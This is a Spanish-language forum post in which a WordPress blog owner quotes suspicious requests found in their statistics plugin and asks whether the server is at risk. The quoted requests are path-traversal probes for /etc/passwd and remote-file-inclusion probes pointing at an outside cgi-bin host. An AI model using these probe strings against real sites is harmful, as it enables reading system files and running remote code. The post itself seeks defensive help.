Accesos extraños a mi blog Tengo un blog hecho con Wordpress 2.7.1 y el plugin para ver estadísticas Statpress Reloaded, que da información sobre la IP del visitante y a que paginas accede, entre otras muchas cosas.
Pues bien, consultando estas estadisticas he visto que tengo varios accesos desde la IP 153.19.97.135 a estas direcciones:
""cfg[path][contenido]=../../../../../../../../etc/passwd""
""cfg[path][contenido]=http://www.suburbane.org//cgi (mi dominio NO es suburbane.org)
""abspath=../../../../../../../../etc/passwd""
""abspath=http://www.suburbane.org//cgi-bin?""
""mosConfig_live_site=../../../../../../../../etc/passwd""
""mosConfig_live_site=http://www.suburbane.org//cgi-bin?""
""phpbb_root_path=../../../../../../../../etc/passwd""
""phpbb_root_path=http://www.suburbane.org//cgi-bin?""
Parece que quieren acceder al fichero de contraseñas del servidor e insertar algo en el mediante un cgi de suburbane, o eso entiendo yo, que más bien entiendo poco
¿vosotros sabeis que significa exactamente?¿mi fichero de contraseñas correo algun peligro?
¿hay alguna vulnerabilidad conocida en wordpress que deba preocuparme?
Gracias.
